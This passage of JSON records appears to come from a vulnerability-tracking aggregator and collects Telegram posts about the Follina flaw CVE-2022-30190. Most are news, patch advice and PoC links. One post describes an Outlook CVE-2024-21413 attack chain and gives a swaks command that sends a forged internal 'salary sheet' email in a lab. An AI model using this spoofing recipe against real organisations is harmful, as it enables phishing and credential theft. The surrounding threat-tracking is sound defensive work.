"https://t.me/habr_com_news/6921", "content": "\u200bMicrosoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043f\u0430\u0442\u0447 \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office\n\n\u0412 \u0440\u0430\u043c\u043a\u0430\u0445 \u0438\u044e\u043d\u044c\u0441\u043a\u043e\u0433\u043e \u0432\u0442\u043e\u0440\u043d\u0438\u043a\u0430 \u043f\u0430\u0442\u0447\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 Microsoft \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0434\u043b\u044f Windows 10 \u0438 11 \u043f\u0440\u043e\u0442\u0438\u0432 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 MS Office CVE-2022-30190.\n\nMicrosoft \u043d\u0430\u0441\u0442\u043e\u044f\u0442\u0435\u043b\u044c\u043d\u043e \u0441\u043e\u0432\u0435\u0442\u0443\u0435\u0442 \u0432\u0441\u0435\u043c \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043d\u0430\u043a\u043e\u043f\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f Windows \u0437\u0430 \u0438\u044e\u043d\u044c 2022 \u0433\u043e\u0434\u0430, \u0432 \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0435\u0441\u0442\u044c \u043f\u0430\u0442\u0447 \u043f\u0440\u043e\u0442\u0438\u0432 CVE-2022-30190. \u0418\u044e\u043d\u044c\u0441\u043a\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0432\u0435\u0442\u0443\u044e\u0442 \u0441\u0440\u0430\u0437\u0443 \u0436\u0435 \u0441\u0442\u0430\u0432\u0438\u0442\u044c \u043a\u0430\u043a \u0442\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u043d\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Microsoft Security Response Center (MSRC), \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0435\u0449\u0435 \u0432 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0430\u043f\u0440\u0435\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u043f\u0435\u0440\u0432\u044b\u0435 \u043e\u0442\u0447\u0451\u0442\u044b \u043e\u0442 \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e \u044d\u0442\u043e\u0439 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u0432\u0435\u0442\u0438\u043b\u0438 \u043e\u0442\u043f\u0438\u0441\u043a\u043e\u0439, \u0447\u0442\u043e \u044d\u0442\u0430 \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u043d\u0435 \u043a\u0440\u0438\u0442\u0438\u0447\u043d\u0430.\n\n#\u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c #microsoft #windows", "creation_timestamp": "2022-06-15T17:30:30.000000Z"}, {"uuid": "326f248b-88b3-49c7-aec2-24fb700718cc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/poxek/1845", "content": "\u0422\u0443\u0442 \u043f\u0430\u0440\u0443 \u0434\u043d\u0435\u0439 \u0438\u043d\u0442\u0435\u0440\u043d\u0435\u0442 \u0433\u0440\u0435\u043c\u0435\u043b  \u043d\u0430 \u0442\u0435\u043c\u0443 0-\u0434\u043d\u044f \u0432 \u043e\u0444\u0438\u0441\u0435 (CVE-2022-30190). \u0412\u0447\u0435\u0440\u0430 \u043c\u0430\u0439\u043a\u0438 \u0432\u044b\u043a\u0430\u0442\u0438\u043b\u0438 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0439 Guidance . \u0432 2\u0445 \u0441\u043b\u043e\u0432\u0430\u0445 \u043d\u0430\u0434\u043e \u043e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c ms-msdt \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435. \ud83e\uddd1\u200d\ud83d\udd27\n\u0434\u0435\u043b\u0430\u0435\u043c \u0431\u044d\u043a\u0430\u043f \u0440\u0435\u0435\u0441\u0442\u0440\u0430\nreg export HKEY_CLASSES_ROOT\\ms-msdt filename\n\u0438 \u0443\u0434\u0430\u043b\u044f\u0435\u043c \u043a\u043b\u044e\u0447 ms-msdt\nreg delete HKEY_CLASSES_ROOT\\ms-msdt /f\n\n\u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e \u043a\u0430\u043a \u0433\u043e\u0441\u043f\u043e\u0434\u0430 \u0432\u044b\u043a\u0430\u0442\u044f\u0442 \u043f\u0430\u0442\u0447, \u043c\u043e\u0436\u043d\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u043d\u0443\u0442\u044c \u043d\u0430 \u043c\u0435\u0441\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u044b\u043c \u0438\u043c\u043f\u043e\u0440\u0442\u043e\u043c \u0431\u044d\u043a\u0430\u043f\u0430\nreg import filename\n\n\u0422\u0430\u043a\u0436\u0435 \u0441\u043e\u043e\u0431\u0449\u0430\u0435\u0442\u0441\u044f \u0447\u0442\u043e \u0417\u0430\u0449\u042b\u0442\u043d\u0438\u043a \u0432\u0438\u043d\u0434\u044b \u0440\u0430\u0441\u043f\u043e\u0437\u043d\u0430\u0435\u0442 \u0434\u0430\u043d\u043d\u0443\u044e \u0432\u043a\u0443\u0441\u044c\u043d\u044f\u0445\u0443 \u043a\u0430\u043a \nTrojan:Win32/Mesdetty.A\u202f\nTrojan:Win32/Mesdetty.B\u202f   Behavior:Win32/MesdettyLaunch.A\nBehavior:Win32/MesdettyLaunch.B\nBehavior:Win32/MesdettyLaunch.C\u202f\n\u0412 \u043e\u0431\u0449\u0435\u043c, \u043d\u0438\u043a\u043e\u0433\u0434\u0430 \u043d\u0435 \u043a\u043b\u0438\u043a\u0430\u0439\u0442\u0435 \u043f\u043e \u043d\u0435\u0437\u043d\u0430\u043a\u043e\u043c\u044b\u043c \u0444\u0430\u0439\u043b\u0438\u043a\u0430\u043c \u0438 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0432\u0430\u0448\u0435\u0433\u043e \u043a\u043e\u043d\u044f \u0432 \u0447\u0438\u0441\u0442\u043e\u0442\u0435.\ud83e\uddfc \n\ud83c\udf0e \u041c\u0438\u0440\u0443 \u2014 \u043c\u0438\u0440!", "creation_timestamp": "2022-06-28T09:49:11.000000Z"}, {"uuid": "d3aeef07-e509-44bb-ac9a-d814493cdc69", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/25", "content": "Top Security News for 02/06/2022\n\nUS Supreme Court puts a hold on enforcement of Texas social media law. INTERPOL issues warning about various forms of online extortion. US Commerce Department will restrict cyber exports to China.\nhttps://thecyberwire.com/newsletters/policy-briefing/4/105 \n\nUnofficial patches for the 0-day vulnerability called Follina (CVE-2022-30190)\nhttps://www.reddit.com/r/netsec/comments/v2maa4/unofficial_patches_for_the_0day_vulnerability/ \n\nRansomware attack turns 2022 into 1977 for Somerset County\nhttps://malware.news/t/ransomware-attack-turns-2022-into-1977-for-somerset-county/60662/1 \n\nDiscord Is the Center of the Crypto World and That\u2019s a Problem\nhttps://www.vice.com/en_us/article/4awkew/discord-is-the-center-of-the-crypto-world-and-thats-a-problem \n\nNASA still \u201cpushing\u201d for a Russian cosmonaut to fly on next SpaceX mission\nhttps://arstechnica.com/?p=1856528 \n\nInformation Security BASICS - Anvil Secure\nhttps://www.reddit.com/r/netsec/comments/v2mrkd/information_security_basics_anvil_secure/ \n\nMinerva's evasion based CTF is open for registration\nhttps://www.reddit.com/r/netsec/comments/v2ehz0/minervas_evasion_based_ctf_is_open_for/ \n\nNSIS Installer Malware Included with Various Malicious Files\nhttps://malware.news/t/nsis-installer-malware-included-with-various-malicious-files/60663/1 \n\nMass account takeover in Yunmai smartscale API (full disclosure)\nhttps://www.reddit.com/r/netsec/comments/v0uv1g/mass_account_takeover_in_yunmai_smartscale_api/ \n\nOST2 Vulnerabilities 1001: C-Family Software Implementation Vulnerabilities (Taught via explaining > 3 dozen CVEs from the last 3 years)\nhttps://www.reddit.com/r/netsec/comments/v2ep1m/ost2_vulnerabilities_1001_cfamily_software/ \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-02T05:00:06.000000Z"}, {"uuid": "00f76cbf-aa88-4ae6-a8e9-6b362f341fbd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/TopCyberTechNews/24", "content": "Top Security News for 01/06/2022\n\nCode execution 0-day in Windows has been under active exploit for 7 weeks\nhttps://arstechnica.com/?p=1857315 \n\nIs quantum teleportation the future of secure communications?\nhttps://blog.malwarebytes.com/reports/2022/05/is-quantum-teleportation-the-future-of-secure-communications/ \n\nFBI warns of education sector credentials on dark web forums\nhttps://blog.malwarebytes.com/privacy-2/2022/05/fbi-warns-of-education-sector-credentials-on-dark-web-forums/ \n\nRunescape phish claims your email has been changed\nhttps://blog.malwarebytes.com/scams/2022/05/runescape-phish-claims-your-email-has-been-changed/ \n\nMicrosoft Releases Workarounds for Office Vulnerability Under Active Exploitation\nhttps://thehackernews.com/2022/05/microsoft-releases-workarounds-for.html \n\nMarjorie Taylor Greene Says Bill Gates Will Force You to Eat Burgers Made in a \u2018Peach Tree Dish\u2019\nhttps://www.vice.com/en_us/article/5dgne3/marjorie-taylor-greene-says-bill-gates-will-force-you-to-eat-burgers-made-in-a-peach-tree-dish \n\nTechnical Advisory: CVE-2022-30190 Zero-day Vulnerability \u201cFollina\u201d in Microsoft Support Diagnostic Tool\nhttps://malware.news/t/technical-advisory-cve-2022-30190-zero-day-vulnerability-follina-in-microsoft-support-diagnostic-tool/60610/1 \n\nSideWinder Hackers Launched Over a 1,000 Cyber Attacks Over the Past 2 Years\nhttps://thehackernews.com/2022/05/sidewinder-hackers-launched-over-1000.html \n\nInterpol Nabs 3 Nigerian Scammers Behind Malware-based Attacks\nhttps://thehackernews.com/2022/05/interpol-nabs-3-nigerian-scammers.html \n\nThe Internet needs to stop getting excited by vaporware EVs\nhttps://arstechnica.com/?p=1857185 \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-06-01T05:00:04.000000Z"}, {"uuid": "1e14f148-7da7-41af-a046-61acd3705058", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/malwar3s/3", "content": "https://github.com/NextSecurity/CVE-2022-30190-follina-Office-MSDT-Fixed", "creation_timestamp": "2023-02-25T05:20:10.000000Z"}, {"uuid": "0093fb79-fd53-4433-895c-f3e051cf5842", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/TopCyberTechNews/127", "content": "Top Security News for 06/09/2022\n\nRansomware Attackers Abuse Genshin Impact Anti-Cheat System to Disable Antivirus\nhttps://thehackernews.com/2022/09/ransomware-attackers-abuse-genshin.html \n\nSAT/SMT Solvers by Example\nhttps://www.reddit.com/r/netsec/comments/x6y3hk/satsmt_solvers_by_example/ \n\nISC StormCast for Tuesday, September 6th, 2022\nhttps://isc.sans.edu/podcastdetail.html?id=8160 \n\nCVE-2022-30190, AKA Follina, Uses Macro-less Word Docs to Drop RCE Files\nhttps://www.reddit.com/r/netsec/comments/x6aqwc/cve202230190_aka_follina_uses_macroless_word_docs/ \n\nPackMyPayload - Emerging Threat of Containerized Malware. It can serve purpose for a Proof-of-Concept presenting emerging risk of container file formats with embedded malware.\nhttps://www.reddit.com/r/Malware/comments/x6xpb4/packmypayload_emerging_threat_of_containerized/ \n\nHacking my Helium Crypto Miner\nhttps://www.reddit.com/r/netsec/comments/x6d97k/hacking_my_helium_crypto_miner/ \n\nJPCERT/CC Releases URL Dataset of Confirmed Phishing Sites\nhttps://malware.news/t/jpcert-cc-releases-url-dataset-of-confirmed-phishing-sites/63125/1 \n\nISC Stormcast For Tuesday, September 6th, 2022 https://isc.sans.edu/podcastdetail.html?id=8160, (Tue, Sep 6th)\nhttps://malware.news/t/isc-stormcast-for-tuesday-september-6th-2022-https-isc-sans-edu-podcastdetail-html-id-8160-tue-sep-6th/63123/1 \n\nWalkthrough of an unauthenticated RCE affecting pfBlockerNG <= 2.1.4_26 (CVE-2022-31814)\nhttps://www.reddit.com/r/netsec/comments/x6b5is/walkthrough_of_an_unauthenticated_rce_affecting/ \n\nMicrosoft will disable Basic authentication for Exchange Online in less than a month\nhttps://www.malwarebytes.com/blog/news/2022/09/microsoft-to-disable-basic-auth-for-exchange-online-in-less-than-a-month \n\n    \nFollow Top Cyber News at https://t.me/TopCyberTechNews\nFeel free to DM me at https://twitter.com/ShayaFeedman", "creation_timestamp": "2022-09-06T14:51:49.000000Z"}, {"uuid": "14ed86ac-57c4-48ac-8a11-50181d44e66d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/beaverdreamer/134", "content": "#outlook #cve #social #CVE\n\u041f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u043c \u043f\u0440\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-21413 \u0432 Outlook (\u043d\u0430 \u0441\u0430\u043c\u043e\u043c \u0434\u0435\u043b\u0435 \u0432 API).\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0437\u0430\u043a\u043b\u044e\u0447\u0430\u0435\u0442\u0441\u044f \u0432 \u043e\u0448\u0438\u0431\u043a\u0435 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 URL, \u043a\u043e\u0433\u0434\u0430 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0431\u0430\u0432\u0438\u0442\u044c ! \u0432 \u043a\u043e\u043d\u0435\u0446 \u0440\u0430\u0441\u0448\u0438\u0440\u0435\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u0430 \u0438 \u043e\u0431\u043e\u0439\u0442\u0438 \u0432\u0441\u0442\u0440\u043e\u0435\u043d\u043d\u044b\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u043f\u0440\u0435\u0449\u0430\u044e\u0442 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432\u043d\u0435\u0448\u043d\u0438\u0445 \u0441\u0443\u0449\u043d\u043e\u0441\u0442\u0435\u0439 (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440 \u043f\u043e \u0441\u0445\u0435\u043c\u0435 file://).\n\u0414\u043b\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u0430 \u0434\u043e\u043b\u0436\u043d\u0430 \u043a\u043b\u0438\u043a\u043d\u0443\u0442\u044c \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u0432 \u043f\u0438\u0441\u044c\u043c\u0435.\n\n\u0410 \u0442\u0435\u043f\u0435\u0440\u044c \u0431\u0435\u0440\u0435\u043c \u0432\u043e \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435, \u0442\u0440\u0438 \u0444\u0430\u043a\u0442\u043e\u0440\u0430:\n- \u0412\u043e \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0435\u0439 \u0441\u0435\u0442\u0438 \u0447\u0430\u0441\u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0432\u0441\u0442\u0440\u0435\u0442\u0438\u0442\u044c \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0439 \u0441\u0435\u0440\u0432\u0435\u0440 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 (\u043c\u043e\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u0442\u0435\u043c \u0436\u0435 swaks)\n- \u0414\u043e\u0432\u0435\u0440\u0438\u0435 \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u043e\u0442 \u043a\u043e\u0433\u043e-\u0442\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0432\u044b\u0448\u0435, \u0447\u0435\u043c \u0441\u043e \u0432\u043d\u0435\u0448\u043d\u0435\u0439 \u0441\u0442\u043e\u0440\u043e\u043d\u044b (\u0434\u0430 \u0438 \u0421\u0417\u0418 \u0441\u0442\u043e\u044f\u0442 \u043d\u0430 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0435)\n- \u0418\u043c\u044f \u0423\u0417 \u0447\u0430\u0441\u0442\u043e \u0441\u043e\u0432\u043f\u0430\u0434\u0430\u0435\u0442 \u0441 \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u043c \u0430\u0434\u0440\u0435\u0441\u043e\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\n\n\u0418 \u0441\u043a\u043b\u0430\u0434\u044b\u0432\u0430\u0435\u043c \u043f\u0430\u0437\u043b \u0430\u0442\u0430\u043a\u0438 \u0431\u0435\u0437 \u0443\u0447\u0435\u0442\u043a\u0438:\n- \u0421\u043e\u0431\u0438\u0440\u0430\u0435\u043c \u043f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u044b\u0445 \u0435\u043c\u0435\u0439\u043b\u043e\u0432 (\u043e\u0442 \u043a\u043e\u0433\u043e \u043f\u043e\u0434\u0434\u0435\u043b\u0430\u0442\u044c \u043f\u0438\u0441\u044c\u043c\u043e \u0438 \u043a\u043e\u043c\u0443 \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u044c)  \u0447\u0435\u0440\u0435\u0437 \u0443\u0442\u0435\u0447\u043a\u0438;\n- \u0427\u0435\u0440\u0435\u0437 \u043a\u0435\u0440\u0431\u0435\u0440\u043e\u0441 \u0432\u044b\u0447\u043b\u0435\u043d\u044f\u0435\u043c \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043a\u0438;\n- \u041e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c \u0438\u043c \u043f\u0438\u0441\u044c\u043c\u043e \u0441 \u0441\u0441\u044b\u043b\u043a\u043e\u0439 \u043d\u0430 \u043d\u0430\u0448\u0443 \u0448\u0430\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0432\u043d\u0443\u0442\u0440\u0435\u043d\u043d\u0438\u0439 \u043f\u043e\u0447\u0442\u043e\u0432\u0438\u043a;\n- \u0416\u0434\u0435\u043c \u043a\u043b\u0438\u043a\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435.\n\n\u041f\u0440\u0438\u043c\u0435\u0440 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 swaks (HTML \u043f\u0438\u0441\u044c\u043c\u043e + \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u0430\u044f \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u043a\u0430):\nswaks --to beaver02@beaver.lab --from beaver03@beaver.lab --server :25 --header \"Subject: \u041f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443\" --body '\u0414\u043e\u0431\u0440\u044b\u0439 \u0434\u0435\u043d\u044c, \u0412\u0430\u043c \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0444\u0430\u0439\u043b\u0443: \u0417\u0430\u0440\u043f\u043b\u0430\u0442\u043d\u0430\u044f \u0432\u0435\u0434\u043e\u043c\u043e\u0441\u0442\u044c \u0437\u0430 2023 \u0433\u043e\u0434' --add-header \"MIME-Version: 1.0\" --add-header \"Content-Type: text/html\" \n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043c\u043e\u0436\u043d\u043e \u0441\u043a\u043e\u043c\u0431\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 0-Click RCE \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0432 Word, \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, Foolina (CVE-2022-30190), \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0430 \u0430\u043a\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0443\u0436\u0435 \u043f\u043e\u0444\u0438\u043a\u0448\u0435\u043d\u043e. \u041c\u0430\u043a\u0440\u043e\u0441\u044b \u043d\u0435 \u043f\u0440\u043e\u0439\u0434\u0443\u0442, \u043f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0447\u0435\u0440\u0435\u0437 API, \u0438 \u043a\u043e\u043d\u043a\u0440\u0435\u0442\u043d\u043e \u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u0435\u0442\u0441\u044f. \u041f\u043e\u0441\u043a\u043e\u043b\u044c\u043a\u0443 \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u043e API, \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c RCE \u0432 \u0434\u0440\u0443\u0433\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043d\u043e \u043f\u043e\u043a\u0430 \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0435\u0440\u0435\u0437 \u0430\u0443\u0442\u043b\u0443\u043a.\n\n\u0421\u0441\u044b\u043b\u043a\u0438:\n - \u0420\u0430\u0437\u0431\u043e\u0440 \u043e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439: https://research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/\n - \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u043e\u0442 MS \u0441 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f\u043c\u0438: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413\n - \u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC Foolina (\u043d\u0430 \u0432\u0441\u044f\u043a\u0438\u0439): https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2024-03-01T21:36:29.000000Z"}, {"uuid": "31200dad-8d16-442b-8013-092ffd1c0d3e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/monkey_hacker/28", "content": "\u0420\u0430\u043d\u043e\u0432\u0430\u0442\u043e, \u043d\u043e \u0442\u0430\u043a\u0438 \u0434\u0430\n\u0422\u041e\u041f 10 \u0438\u0437 2022\n\n1. Follina (CVE-2022-30190)\n2. Log4Shell (CVE-2021-44228)\n3. Spring4Shell (CVE-2022-22965)\n4. F5 BIG-IP (CVE-2022-1388)\n5. Google Chrome zero-day (CVE-2022-0609)\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)\n7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)\n8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)\n9. Atlassian Confluence RCE flaw (CVE-2022-26134)\n10. Zyxel RCE vulnerability (CVE-2022-30525)", "creation_timestamp": "2022-11-29T07:00:36.000000Z"}, {"uuid": "380edc6a-f074-454e-8992-d047edf8b892", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/package_security/17", "content": "\u200b\ud83c\udfc6 \u0418\u0442\u043e\u0433\u0438 \u0433\u043e\u0434\u0430\n\n\u041d\u0430\u0441\u0442\u0430\u043b\u043e \u0432\u0440\u0435\u043c\u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c \u043e \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u0435.\n2\u043a22 \u0433\u043e\u0434 \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u043e\u0434\u0445\u043e\u0434\u0438\u0442 \u043a \u043a\u043e\u043d\u0446\u0443, \u0430 \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043f\u043e\u0440\u0430 \u043f\u043e\u0434\u0432\u043e\u0434\u0438\u0442\u044c \u0438\u0442\u043e\u0433\u0438.\n\n\u0423 \u043a\u0438\u0431\u0435\u0440\u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u0438\u043a\u043e\u0432, \u043a\u0430\u043a \u0438 \u0432\u0441\u0435\u0433\u0434\u0430, \u0438\u0442\u043e\u0433\u0438 \u0441\u0432\u043e\u0438. \u041f\u043e\u044d\u0442\u043e\u043c\u0443 \u0434\u0435\u0440\u0436\u0438\u0442\u0435 \u0422\u041e\u041f-10 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0432 2022 \u0433\u043e\u0434\u0443 \u043f\u043e \u0432\u0435\u0440\u0441\u0438\u0438 Cyber Threat Intelligence:\n\n1. Follina (CVE-2022-30190) \n\n2. Log4Shell (CVE-2021-44228) \n\n3. Spring4Shell (CVE-2022-22965) \n\n4. F5 BIG-IP (CVE-2022-1388) \n\n5. Google Chrome zero-day (CVE-2022-0609) \n\n6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882) \n\n7. 